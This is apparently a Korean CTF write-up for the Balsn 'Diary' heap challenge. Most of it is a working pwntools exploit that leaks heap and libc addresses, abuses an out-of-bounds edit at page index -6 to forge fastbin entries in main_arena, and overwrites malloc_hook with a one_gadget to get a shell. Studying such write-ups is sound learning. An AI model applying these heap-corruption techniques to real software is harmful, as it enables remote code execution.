<문제>
Diaries -- fun to read, painful to keep
nc diary.balsnctf.com 10101
Source Code
<문제 풀이에 사용된 코드>
아직 정확히는 이해를 못해서 더 heap에 대해 알아봐야할 것 같다.
#!/usr/bin/env python3
from pwn import *
# Tell pwntools the target is amd64.
context.update(arch='amd64')
# Local run (needs the challenge binary and its libc next to the script):
#r = process('./diary', env={'LD_PRELOAD':'./libc-2.29.so'})
r = remote('diary.balsnctf.com', 10101)
def cmd(x):
    """Wait for the menu prompt, then send menu choice *x* (no newline appended)."""
    r.sendafter('choice : ', str(x))
def ss():
    """Select menu option 1 (the "show" entry the script reads the name back from)."""
    cmd(1)
def ww(l, s):
    """Menu option 2: write a new page of length *l* holding content *s*.

    *l* goes through int() so both ints and numeric strings are accepted;
    *s* is passed to the tube as given (the call sites use both str and bytes).
    """
    cmd(2)
    r.sendafter('Length : ', str(int(l)))
    r.sendafter('Content : ', s)
def rr(p):
    """Menu option 3: ask the service to print page *p* (caller reads the output)."""
    cmd(3)
    r.sendafter('Page : ', str(int(p)))
def ee(p, s):
    """Menu option 4: edit page *p*, sending *s* as the new content.

    The index is forwarded unchanged; the script header states that the
    server-side edit has no bounds check, which the ``ee(-6, ...)`` call relies on.
    """
    cmd(4)
    r.sendafter('Page : ', str(int(p)))
    r.sendafter('Content : ', s)
def tt(p):
    """Menu option 5 on page *p* (the header note implies this frees the page -- confirm against the binary)."""
    cmd(5)
    r.sendafter('Page : ', str(int(p)))
'''
1. Use "show name" to leak heap address
2. "Edit" has OOB vuln, use this vuln can overwrite IO_stdin and main_arena
So we can create fake fastbin list and create a fake chunk at front address of malloc_hook
3. Then let fake fastbin list to fill up tcache
4. finally we can use fake fastbin to create a chunk at fake chunk that we made in step2,
then control malloc_hook!
'''
# --- step 1: heap leak via "show name" -------------------------------------
# The name is sent without a terminator; the six bytes printed right after
# the 32 'a's are read back as a heap pointer.
NAME = 'a' * 32
r.sendafter('name : ', NAME)
ww(0x80, 'a')                       # page 0
ss()
r.recvuntil(NAME)
leak_heap = u64(r.recv(6).ljust(8, b'\x00'))
print(hex(leak_heap))


def entry(ptr, size=0x31):
    """Pack one (pointer, size) pair as two 8-byte words."""
    return p64(ptr) + p64(size)


# --- step 2: lay out the fake list entries on the heap ----------------------
# Every offset below is relative to the leaked heap address and is specific
# to this binary and the libc it was served with.
payload = p32(0) + p64(0x31) + entry(0)
for off in (0xb0, 0xc0, 0xd0, 0xe0, 0x120):
    payload += entry(leak_heap + off)
payload += p32(0)
ww(0x80, payload)                   # page 1

# NOTE(review): 31 here is decimal (0x1f) while every other size word is
# 0x31; the exploit ran as posted, so it is kept -- confirm it was intended.
payload2 = p32(0) + p64(31)
for off in (0x130, 0x140, 0x1f0, 0x1f0):   # 0x1f0 twice, as in the original
    payload2 += entry(leak_heap + off)
ww(0x80, payload2)                  # page 2

# Pages 3 and 7 carry a 0x71 size word; pages 4-6 are one-byte fillers.
size71 = p32(0) + p64(0) * 5 + p64(0x71)
ww(0x80, size71)                    # page 3
for _ in range(3):
    ww(0x80, 'a')                   # pages 4, 5, 6
ww(0x80, size71)                    # page 7

# --- step 3: option 5 on pages 7..0, highest first ---------------------------
for page in range(7, -1, -1):
    tt(page)

# --- step 4: out-of-bounds edit through page index -6 ------------------------
# Trailing comments repeat the offsets the original listing annotated.
arena_ptrs = (
    leak_heap + 0xb0,               # 0x20
    leak_heap + 0x20,               # 0x30
    leak_heap,                      # 0x40
    leak_heap,                      # 0x50
    leak_heap + 0x20,               # 0x60
    leak_heap + 0x200 - 0x28,       # 0x70
    leak_heap + 0x200,              # 0x80
)
payload3 = b''.join([
    p32(0),
    b'\x00' * 0x210,
    p64(0x31),
    p64(0) * 6,
    *map(p64, arena_ptrs),
    p64(0),
    p64(leak_heap + 0x200) * 8,
])
ww(0x44, b'\x00' * 4 + p64(0x51) + p64(0) * 3 + p64(0x31) + p64(leak_heap + 0xb0))  # page 8
ee(-6, payload3)                    # negative index: the edit lands outside the page table

# --- step 5: libc leak through page 9 ----------------------------------------
FILL = 'a' * 0x24
ww(0x24, FILL)                      # page 9
rr(9)
r.recvuntil(FILL)
leak_libc = u64(r.recv(6).ljust(8, b'\x00'))
print(hex(leak_libc))
ww(0x60, p32(0) + p64(0) + p64(0x31) + p64(leak_libc - 0x90))   # page 10

# The two constants below belong to the libc the challenge shipped
# (presumably the libc-2.29 named in the commented LD_PRELOAD line);
# they will not match another build.
libc_base = leak_libc - 0x1e4ca0
print(hex(libc_base))
one_off = 0x106ef8
one_gadget = libc_base + one_off
ww(30, 'a')                         # page 11
ww(30, b'a' * 12 + p64(one_gadget)) # page 12
# BALSN{wh3n_wri73_1s_re4d_4nd_pu7_is_g3t}
r.interactive()